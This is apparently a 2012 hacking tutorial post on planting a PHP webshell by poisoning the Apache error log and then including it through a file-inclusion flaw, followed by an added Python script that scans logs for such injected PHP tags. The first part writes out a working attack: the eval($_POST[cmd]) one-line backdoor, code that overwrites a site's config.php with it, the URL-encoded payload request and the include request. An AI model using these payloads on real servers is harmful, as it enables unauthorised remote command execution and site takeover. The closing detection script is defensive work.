Title: Writing a webshell by including the Apache log in PHP
Author: admin
Time: 2012-9-15 14:27

The method above is not very practical: in my testing I found that the log is often tens of megabytes in size, which takes the fun out of it. Thinking a little further, we can instead write a really usable webshell, which is also much better than the painfully slow method above.

For example, take the same one-line trojan:

<?eval($_POST[cmd]);?>

By now you may have figured it out; this is a pretty good approach. Next, the question becomes how to write it. Use fopen to open the file /home/virtual/www.xxx.com/forum/config.php and then write the one-line trojan server-side statement <?eval($_POST[cmd]);?> into it. Put together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?> //write the one-line trojan statement into config.php
We submit this statement and let Apache record it in the error log; including the log then writes the shell successfully. Remember that it must be converted to URL format to succeed.

Converted, it is:

%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

We submit:

http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
This way the error log records this line of code that writes the webshell.

Then we include the log by submitting:

http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
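
The request described above leaves a PHP open tag in the Apache logs, either percent-encoded or decoded, so a log scan can flag it before any include reaches the file. The following check is an added example, not part of the original post; the function names, log lines, IP addresses and paths are constructed for illustration.

```python
import re
from urllib.parse import unquote

# "<?php", "<?=" or a short tag followed by code; "<?xml" is excluded.
PHP_TAG = re.compile(r"<\?(?!xml)(php|=|\s*[$a-zA-Z_])", re.IGNORECASE)
# Function names that add context to a hit. Not used alone: genuine PHP
# warnings in an error log legitimately mention fopen() and friends.
RISKY_CALL = re.compile(
    r"\b(eval|assert|system|passthru|fopen|fputs|fwrite|file_put_contents)\s*\(",
    re.IGNORECASE)

def decode_fully(text, max_rounds=3):
    """Percent-decode repeatedly so double-encoded tags are caught too."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_log(lines):
    """Return [(line_number, reasons)] for lines that carry a PHP open tag."""
    findings = []
    for number, line in enumerate(lines, start=1):
        decoded = decode_fully(line)
        if not PHP_TAG.search(decoded):
            continue
        calls = sorted({m.group(1).lower() for m in RISKY_CALL.finditer(decoded)})
        findings.append((number, ["php-open-tag"] + ["call:" + c for c in calls]))
    return findings

# Constructed sample lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    "[Sat Sep 15 14:20:01 2012] [error] [client 192.0.2.10] "
    "File does not exist: /var/www/html/favicon.ico",
    "[Sat Sep 15 14:21:07 2012] [error] [client 192.0.2.10] PHP Warning:  "
    "fopen(/tmp/cache.dat): failed to open stream in /var/www/html/index.php on line 12",
    "[Sat Sep 15 14:22:30 2012] [error] [client 198.51.100.7] "
    "File does not exist: /var/www/html/<?eval($_POST[cmd]);?>",
    '198.51.100.7 - - [15/Sep/2012:14:22:30 +0800] '
    '"GET /%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E HTTP/1.1" 404 209',
    '203.0.113.5 - - [15/Sep/2012:14:25:02 +0800] '
    '"GET /index.php?x=%253C%253Fphp HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, reasons in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

The genuine fopen() warning on the second sample line is not flagged, because a hit requires an open tag. The scan only detects the injection; the fix is to keep user-controlled values out of include paths and to keep log files outside any directory PHP is allowed to read.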